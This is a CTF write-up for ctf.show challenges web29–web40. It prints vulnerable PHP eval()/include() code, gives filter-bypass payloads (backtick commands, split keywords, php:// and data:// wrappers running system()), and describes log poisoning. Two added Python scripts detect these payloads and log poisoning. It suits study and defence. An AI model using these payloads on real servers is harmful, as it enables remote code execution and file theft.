web29
The challenge only filters the keyword flag, so a wildcard is enough to bypass it.
<?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    // denylist: only the literal string "flag" (case-insensitive) is rejected
    if(!preg_match("/flag/i", $c)){
        eval($c);
    }
}else{
    highlight_file(__FILE__);
}
Official solution:
c=echo `nl fl''ag.php`;
then view the page source.
web30
<?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    // denylist now also rejects "system" and "php"
    if(!preg_match("/flag|system|php/i", $c)){
        eval($c);
    }
}else{
    highlight_file(__FILE__);
}
Filters system, php and flag. Keep bypassing with the wildcard trick, and use backticks for command execution.
Official solution:
c=echo `nl fl''ag.p''hp`;
Keywords can be bypassed by inserting an empty string ('') into them.
web31
Filters spaces and some keywords; reuse the previous payload and bypass the space.
But after reading the write-up, there is an even slicker approach; it broadened my horizons.
show_source(next(array_reverse(scandir(pos(localeconv())))));
web32
Filters spaces, parentheses and output (echo); the previous approach no longer works, so a different one is needed.
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:56:31
# @email: [email protected]
# @link: https://ctfer.com
*/
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    // denylist: keywords plus ".", space, quotes, backtick, ";" and "("
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){
        eval($c);
    }
}else{
    highlight_file(__FILE__);
}
include does not need parentheses for file inclusion, so it survives the filter.
payload: c=include$_GET[url]?>&url=php://filter/read=convert.base64-encode/resource=flag.php
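The three challenges above (web29, web30 and web32) show the same defensive lesson from different angles: a denylist regex over one parameter never sees the keyword once it is split with an empty string, and never sees the other parameter at all. The following script is an added example, not part of the original write-up or of the ctf.show challenge code. It reproduces the page's three preg_match denylists in Python, shows that each payload shape passes the challenge's own check, and then runs a normalized check (empty-quote pairs removed, every parameter inspected, stream wrappers and shell wildcards flagged) that catches all of them. The query strings are constructed here from the payloads on the page; the function names (challenge_filter_passes, normalize, analyze) are this example's own.

```python
import re
from urllib.parse import parse_qs, unquote_plus

# The denylists as they appear in the challenge sources quoted above (PHP /.../i -> re.I).
DENYLIST = {
    "web29": re.compile(r"flag", re.I),
    "web30": re.compile(r"flag|system|php", re.I),
    "web32": re.compile(r"flag|system|php|cat|sort|shell|\.| |'|`|echo|;|\(", re.I),
}

# Constructed query strings reproducing the payload shapes discussed on the page.
QUERIES = {
    "web29": "c=echo `nl fl''ag.php`;",
    "web30": "c=echo `nl fl''ag.p''hp`;",
    "web32": "c=include$_GET[url]?>&url=php://filter/read=convert.base64-encode/resource=flag.php",
}

KEYWORDS = ("flag", "system", "php", "include", "eval")
EMPTY_QUOTES = re.compile(r"''|\"\"")                    # fl''ag, p""hp
WRAPPER = re.compile(r"\b(?:php|data|file|phar|zip|glob|expect)://|\bdata:", re.I)
GLOB = re.compile(r"(?<=\w)[*?]|[*?](?=\w)")            # f*, fl?g


def challenge_filter_passes(name: str, query: str) -> bool:
    """True when the challenge's own check (only parameter c, raw string) would reach eval()."""
    c = parse_qs(query, keep_blank_values=True).get("c", [""])[0]
    return DENYLIST[name].search(c) is None


def normalize(value: str) -> str:
    """Canonical form of one parameter value for matching."""
    v = unquote_plus(value)            # second decode pass handles double-encoded input
    while EMPTY_QUOTES.search(v):      # collapse empty string literals used to split words
        v = EMPTY_QUOTES.sub("", v)
    return v.lower()


def analyze(query: str) -> list:
    """Inspect EVERY parameter of the query string and return sorted indicator names."""
    findings = set()
    for values in parse_qs(query, keep_blank_values=True).values():
        for raw in values:
            v = normalize(raw)
            findings.update(f"keyword:{k}" for k in KEYWORDS if k in v)
            if "`" in v:
                findings.add("backtick")
            if WRAPPER.search(v):
                findings.add("wrapper")
            if GLOB.search(v):
                findings.add("glob")
    return sorted(findings)


if __name__ == "__main__":
    for name, query in QUERIES.items():
        print(name, "passes challenge filter:", challenge_filter_passes(name, query),
              "| normalized findings:", analyze(query))
```

The web32 case is the important one: normalizing c alone would still miss it, because the sensitive string lives in url. Whatever regex is used, the real fix is to not hand user input to eval() or include() in the first place, or to compare it against an allowlist of expected values rather than a denylist of bad ones.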
web33
The previous approach still works.
web34-36
Filtered:
, and you can still use
web37
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 05:18:55
# @email: [email protected]
# @link: https://ctfer.com
*/
//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    // only the string "flag" is rejected; $c goes straight into include()
    if(!preg_match("/flag/i", $c)){
        include($c);
        echo $flag;
    }
}else{
    highlight_file(__FILE__);
}
Read the source:
?c=data://text/plain,<?php system("tac f*");?>
Alternative solution:
Include the log file:
First write a one-line webshell through the User-Agent header; after the request errors it is written to the log file, then include the log file.
web38
payload: http://cfa8369c-5730-45a7-888b-1d15b1e2826c.challenge.ctf.show:8080/?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==
web39
The suffix .php is appended to $c.
payload:
http://bc01f54b-b3fc-43e1-86c8-ebac395463ba.challenge.ctf.show:8080/?c=data://text/plain,<?php echo `cat *.php`;//
web40
A lot is filtered; try a parameterless construction.
<?php
if(isset($_GET['c'])){
    $c = $_GET['c'];
    // digits and almost every symbol are rejected; note that the parentheses in
    // the pattern are the fullwidth （ ）, so ASCII ( ) are still allowed
    if(!preg_match("/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\（|\）|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $c)){
        eval($c);
    }
}else{
    highlight_file(__FILE__);
}
payload:
?c=print_r(show_source(array_rand(array_flip(scandir(pos(localeconv()))))));
Just run it a few times (array_rand picks a random file each time).
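The log-file inclusion described under web37 (plant a PHP tag in a logged header, then include the log through the unfiltered include parameter) is a two-step pattern that is easy to spot from the server side. The following detector is an added example, not part of the original write-up or of the ctf.show challenges: it parses Apache/nginx combined-format access-log lines, flags PHP open tags in the User-Agent or Referer field, flags requests whose query parameters name a log-file path, and correlates the two by client IP. The three log lines are constructed for this example; the function names (parse_line, query_values, analyze_log) are this example's own.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Apache/nginx "combined" access-log layout.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>\S+)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
PHP_TAG = re.compile(r"<\?(?:php\b|=)", re.I)
# Path fragments that have no business in an include parameter.
LOG_PATH_FRAGMENTS = ("/var/log/", "access.log", "error.log", "access_log", "error_log")

# Constructed sample lines (not from the original page): one client plants a PHP tag in its
# User-Agent and later asks the include parameter for the log file; another client is benign.
SAMPLE_LOG = """\
203.0.113.7 - - [04/Sep/2020:00:12:34 +0000] "GET /index.php?c=missing.txt HTTP/1.1" 200 312 "-" "<?php echo 'x';?>"
198.51.100.9 - - [04/Sep/2020:00:12:36 +0000] "GET /index.php?c=about.txt HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [04/Sep/2020:00:12:40 +0000] "GET /index.php?c=/var/log/nginx/access.log HTTP/1.1" 200 8812 "-" "Mozilla/5.0"
"""


def parse_line(line: str):
    """Dict of the named fields for one combined-format line, or None if it does not parse."""
    m = LOG_LINE.match(line)
    return m.groupdict() if m else None


def query_values(target: str) -> list:
    """All decoded query-string values of the request target."""
    qs = urlsplit(target).query
    return [v for vals in parse_qs(qs, keep_blank_values=True).values() for v in vals]


def analyze_log(text: str) -> list:
    """Return (finding, subject) pairs in log order.

    A poison_then_include finding means the same IP first put a PHP tag into a
    logged header and later requested a log path through a parameter."""
    findings = []
    poisoned = set()  # IPs that have written a PHP tag into the log
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            findings.append(("unparsed_line", line[:40]))
            continue
        if PHP_TAG.search(rec["ua"]) or PHP_TAG.search(rec["referer"]):
            findings.append(("php_tag_in_header", rec["ip"]))
            poisoned.add(rec["ip"])
        if any(frag in v for v in query_values(rec["target"]) for frag in LOG_PATH_FRAGMENTS):
            findings.append(("log_path_in_param", rec["ip"]))
            if rec["ip"] in poisoned:
                findings.append(("poison_then_include", rec["ip"]))
    return findings


if __name__ == "__main__":
    for finding in analyze_log(SAMPLE_LOG):
        print(*finding)
```

Either single signal is worth an alert on its own; the correlated pair is close to certain. On the prevention side, the same include($c) line is defused by an allowlist of includable files or by open_basedir restrictions, and the data:// variants on this page are shut off with allow_url_include=Off.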